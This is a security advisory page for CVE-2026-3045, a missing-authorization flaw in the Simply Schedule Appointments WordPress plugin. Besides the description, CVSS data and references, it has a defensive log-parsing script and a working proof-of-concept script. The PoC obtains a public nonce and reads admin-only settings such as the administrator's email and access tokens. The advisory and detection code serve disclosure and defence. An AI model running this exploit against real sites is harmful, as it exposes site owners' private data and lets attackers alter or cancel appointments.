Security Vulnerability Report
CVE-2026-3045 CVSS 7.5 HIGH

Published: 2026-03-13 19:55:10
Last Modified: 2026-04-22 21:30:26

Description

The Appointment Booking Calendar — Simply Schedule Appointments plugin for WordPress is vulnerable to unauthorized access of sensitive data in all versions up to and including 1.6.9.29. This is due to two compounding weaknesses: (1) a non-user-bound `public_nonce` is exposed to unauthenticated users through the public `/wp-json/ssa/v1/embed-inner` REST endpoint, and (2) the `get_item()` method in `SSA_Settings_Api` relies on `nonce_permissions_check()` for authorization (which accepts the public nonce) but does not call `remove_unauthorized_settings_for_current_user()` to filter restricted fields. This makes it possible for unauthenticated attackers to access admin-only plugin settings including the administrator email, phone number, internal access tokens, notification configurations, and developer settings via the `/wp-json/ssa/v1/settings/{section}` endpoint. The exposure of appointment tokens also allows an attacker to modify or cancel appointments.
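
The description above implies a two-request sequence that is visible in ordinary web-server logs. As an added defender-side example (not part of this advisory, the NVD record, or the plugin's code), the Python below parses constructed combined-format access-log lines and flags each successful read of `/wp-json/ssa/v1/settings/{section}`, marking it as chained when the same client fetched `/wp-json/ssa/v1/embed-inner` shortly beforehand. The log format, the sample addresses and the 300-second window are assumptions.

```python
import re
from datetime import datetime

# Constructed sample access-log lines (combined log format); not from any real server.
# Lines 1-2 show the chain from the advisory: an anonymous fetch of embed-inner
# followed shortly by a read of settings/<section> from the same client.
SAMPLE_LOG = """\
203.0.113.7 - - [13/Mar/2026:20:01:02 +0000] "GET /wp-json/ssa/v1/embed-inner HTTP/1.1" 200 812 "-" "python-requests/2.31"
203.0.113.7 - - [13/Mar/2026:20:01:03 +0000] "GET /wp-json/ssa/v1/settings/admin HTTP/1.1" 200 4096 "-" "python-requests/2.31"
198.51.100.4 - - [13/Mar/2026:20:05:10 +0000] "GET /wp-json/ssa/v1/embed-inner HTTP/1.1" 200 812 "https://example.test/book/" "Mozilla/5.0"
198.51.100.4 - - [13/Mar/2026:20:05:11 +0000] "GET /wp-json/ssa/v1/availability HTTP/1.1" 200 2048 "https://example.test/book/" "Mozilla/5.0"
192.0.2.9 - - [13/Mar/2026:20:30:00 +0000] "GET /wp-json/ssa/v1/settings/developer HTTP/1.1" 200 1500 "-" "curl/8.4"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
EMBED_PATH = "/wp-json/ssa/v1/embed-inner"          # public nonce source
SETTINGS_PREFIX = "/wp-json/ssa/v1/settings/"      # settings/{section} reads


def parse_line(line):
    """Return (ip, timestamp, method, path, status) or None for unparseable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("method"), m.group("path"), int(m.group("status"))


def find_settings_reads(log_text, window_seconds=300):
    """List (ip, section, chained) for every successful GET of settings/{section}.
    chained is True when the same client fetched embed-inner within window_seconds
    beforehand, the sequence CVE-2026-3045 relies on; window size is an assumption."""
    last_embed = {}   # ip -> time of its most recent embed-inner fetch
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, method, path, status = rec
        if method != "GET" or status != 200:
            continue
        if path == EMBED_PATH:
            last_embed[ip] = ts
        elif path.startswith(SETTINGS_PREFIX):
            section = path[len(SETTINGS_PREFIX):].split("?")[0]
            prior = last_embed.get(ip)
            chained = prior is not None and 0 <= (ts - prior).total_seconds() <= window_seconds
            hits.append((ip, section, chained))
    return hits
```

Legitimate admin screens also read settings sections, but they do so with a logged-in session; an anonymous client that obtained the public nonce first and then read a section is the pattern worth alerting on, and any unchained settings read from an unknown client still deserves a look.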

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

Simply Schedule Appointments < 1.6.9.30 (no further configuration data available)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# CVE-2026-3045 PoC - Unauthorized access to WordPress plugin settings
# Target: Simply Schedule Appointments plugin <= 1.6.9.29
TARGET_URL = "http://target-wordpress-site.com"


def exploit_cve_2026_3045():
    # Step 1: Get public_nonce from the exposed endpoint
    embed_url = f"{TARGET_URL}/wp-json/ssa/v1/embed-inner"
    try:
        response = requests.get(embed_url, timeout=10)
        if response.status_code == 200:
            data = response.json()
            public_nonce = data.get('public_nonce')
            print(f"[+] Obtained public_nonce: {public_nonce}")

            # Step 2: Access admin settings using the public nonce
            settings_url = f"{TARGET_URL}/wp-json/ssa/v1/settings/admin"
            headers = {
                'X-WP-Nonce': public_nonce
            }
            settings_response = requests.get(settings_url, headers=headers, timeout=10)
            if settings_response.status_code == 200:
                settings = settings_response.json()
                print("[+] Successfully accessed admin settings!")
                print(f"[+] Settings data: {settings}")
                return settings
    except Exception as e:
        print(f"[-] Error: {e}")
    return None


if __name__ == "__main__":
    exploit_cve_2026_3045()
```

Weakness

CWE-862 (Missing Authorization)

NVD Status: Deferred

References

https://plugins.trac.wordpress.org/browser/simply-schedule-appointments/tags/1.6.9.21/includes/class-bootstrap.php#L151
https://plugins.trac.wordpress.org/browser/simply-schedule-appointments/tags/1.6.9.21/includes/class-settings-api.php#L128
https://plugins.trac.wordpress.org/browser/simply-schedule-appointments/tags/1.6.9.21/includes/lib/td-util/class-td-api-model.php#L361
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3480506%40simply-schedule-appointments%2Ftrunk&old=3475885%40simply-schedule-appointments%2Ftrunk&sfp_email=&sfph_mail=#file0
https://www.wordfence.com/threat-intel/vulnerabilities/id/5970b8d6-0041-4c30-a6ce-fe67ebf415f5?source=cve